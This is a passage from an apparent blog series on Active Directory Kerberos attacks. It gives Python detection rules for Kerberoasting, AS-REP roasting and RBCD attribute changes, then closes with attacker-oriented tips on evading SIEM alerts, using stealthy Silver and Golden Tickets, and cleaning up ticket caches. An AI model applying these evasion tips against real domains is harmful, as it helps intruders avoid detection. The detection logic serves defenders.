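    _ev("2024-05-01T09:10:05", id=4768, user="asmith", preauth_type=2, status=0x0, src="10.0.0.77"),
    # 4662 write to the RBCD attribute on a computer object.
    _ev("2024-05-01T09:20:00", id=4662, subject="jdoe", object="CN=FILESRV01,OU=Servers,DC=corp,DC=local",
        attribute="msDS-AllowedToActOnBehalfOfOtherIdentity", access="Write Property"),
]


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=5):
    """Flag a source that obtains RC4 service tickets for >= threshold distinct non-machine
    service accounts inside one window. Machine accounts ($) and krbtgt are ignored because
    their tickets are not the ones a Kerberoaster asks for."""
    per_src = defaultdict(list)
    for e in events:
        if (e["id"] == 4769 and e["etype"] == RC4_HMAC
                and not e["service"].endswith("$") and e["service"] != "krbtgt"):
            per_src[e["src"]].append(e)
    alerts = []
    for src, evs in per_src.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            services = {e["service"] for e in in_window}
            if len(services) >= threshold:
                alerts.append({"rule": "kerberoasting", "src": src, "user": first["user"],
                               "services": sorted(services)})
                break  # one alert per source is enough
    return alerts


def detect_asrep_roasting(events):
    """4768 that succeeded (status 0x0) with Pre-Authentication Type 0: the KDC returned an
    AS-REP without any proof of the password."""
    return [{"rule": "asrep_roasting", "user": e["user"], "src": e["src"]}
            for e in events if e["id"] == 4768 and e.get("preauth_type") == 0 and e.get("status") == 0x0]


def detect_rbcd_change(events):
    """4662 where the accessed property is the RBCD attribute."""
    return [{"rule": "rbcd_modified", "subject": e["subject"], "object": e["object"]}
            for e in events if e["id"] == 4662 and e.get("attribute", "").lower() == RBCD_ATTRIBUTE]


def run_all(events):
    return detect_kerberoasting(events) + detect_asrep_roasting(events) + detect_rbcd_change(events)


if __name__ == "__main__":
    for alert in run_all(SAMPLE_EVENTS):
        print(alert)
```

Real 4662 events carry the property as a schema GUID rather than a name, and 4769 carries Ticket Encryption Type as a hex string, so a production version maps those first; the grouping and thresholds stay the same.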
Operational Considerations
- Prefer AES over RC4 when possible. RC4 Kerberos requests are rare in modern environments and immediately flagged by most SIEMs.
- Silver Tickets are the stealthiest ticket attack since validation happens at the target service, not the DC. No DC logs are generated.
- Use sacrificial processes on Windows (`Rubeus createnetonly`) to avoid disrupting existing sessions.
- Clean up after yourself: `unset KRB5CCNAME` on Linux, `klist purge` on Windows.
- Golden Ticket longevity: by default, TGTs are valid for 10 hours and renewable for 7 days. Golden Tickets bypass these limits, but unusual ticket lifetimes are a detection vector.
What's Next
The next post in this series will cover ACL-based attacks, NTLM relay, and ADCS exploitation techniques.